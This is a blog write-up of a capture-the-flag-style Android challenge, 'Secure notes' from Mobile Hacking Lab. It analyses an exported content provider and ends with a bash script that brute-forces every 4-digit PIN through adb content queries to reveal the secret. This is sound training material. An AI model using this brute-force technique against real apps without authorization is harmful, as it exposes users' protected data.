> For the complete documentation index, see [llms.txt](https://kero0x1.gitbook.io/general/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kero0x1.gitbook.io/general/mobile-pentest/mobile-hacking-lab/secure-notes.md).

# Secure notes

Hello everyone , In this blog post , I will try to explain my solution steps for Secure notes challenge from Mobile Hacking Lab Platform . i hope it will be useful for you

1. Let’s Examine the `AndroidMainfest.xml`

2. After That i found 2 Providers ( `com.mobilehackinglab.securenotes.secretprovider` - `androidx.startup.InitializationProvider`) and 1 exported Activity (`MainActivity` )

   ![image.png](https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FOCGVXJNBtxWq96q7YIh9%2Fimage.png?alt=media)

3. The `MainActivity` interact with a content provider, to validate a PIN and retrieve a secret value associated with that PIN.

4. there is a listener set on a `submitPinButton`,
   1. when click the code call `onCreate$lambda$0 ()` function ,,
   2. then it , which retrieves the text from `pinEditText`
   3. then use `querySecretProvider` to validate the entered pin

      <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2Fu7tYoiUMrwXcMZHaW1Fs%2Fimage.png?alt=media&amp;token=338a5724-c73d-45fa-9274-70be95414fb3" alt="" width="563"><figcaption></figcaption></figure>

5. Let’s analysis the `com.mobilehackinglab.securenotes.SecretDataProvider` :

   1. first of all the correct Pin use a key to decrypt the data stored in `config.properties` file

      <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FfWk3IAcTVNlyefsdDLMo%2Fimage.png?alt=media&amp;token=b3f1d6c4-3c2b-4912-b1bf-4091caf3aaf5" alt="" width="563"><figcaption></figcaption></figure>
   2. then let’s keep going in our code

      <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2F5nAi8u65Rbr6F35cUUgG%2Fimage.png?alt=media&amp;token=ac092dc4-4601-48b6-881e-0572a8f4580f" alt="" width="563"><figcaption></figcaption></figure>
   3. it take a query string
   4. check for if it null , return null
   5. if there is a value then remove the prefix and then extract the int number from it

      <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FwkOLnTfK75f6oJlTdCU8%2Fimage.png?alt=media&amp;token=f49e5eb1-ee99-4348-9c0a-cd30a135b745" alt="" width="563"><figcaption></figcaption></figure>
   6. in the end it invoke the `decryptSecret()`
   7. if the Cursor return valid , the code look for `secret column` to query the pin
   8. If a valid cursor is returned and data is available, the code looks for a column named `"Secret"`, expecting this to hold the result of the query.

6. Let’s back to the `config.properties` file and try to decrypt it manual

   <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2Ft09Gtrtqt03jm8Tqa0eK%2Fimage.png?alt=media&amp;token=6500ab54-fd2b-46b8-a3f5-babc9829ac92" alt="" width="563"><figcaption></figcaption></figure>

7. Let’s try to brute force the pinget the decrypted Text

   ```jsx
   #!/bin/bash

   # Define the content provider URI
   CONTENT_URI="content://com.mobilehackinglab.securenotes.secretprovider"

   # Loop through all 4-digit PIN combinations (0000 to 9999)
   for pin in $(seq -w 0000 9999); do
       echo "Trying PIN: $pin"

       # Use ADB to send the query command to the content provider
       adb shell content query --uri "$CONTENT_URI" --where "pin=$pin"

       # Check the output to see if it indicates a successful attempt
       # Assuming "Secret" is returned upon success, otherwise adjust the condition
       if adb shell content query --uri "$CONTENT_URI" --where "pin=$pin" | grep -q "Secret"; then
           echo "PIN found: $pin"
           break
       fi
   done
   ```

<figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2F3UERiJZrKmYrOqOlbxwR%2Fimage.png?alt=media&amp;token=8d252d63-c875-479f-8c6e-e7333a8cea3e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2F6VWHNGbgC25eM6z8Eiy8%2Fimage.png?alt=media&amp;token=d80aa30a-67a3-45f0-a44e-e216012cfbe2" alt=""><figcaption></figcaption></figure>
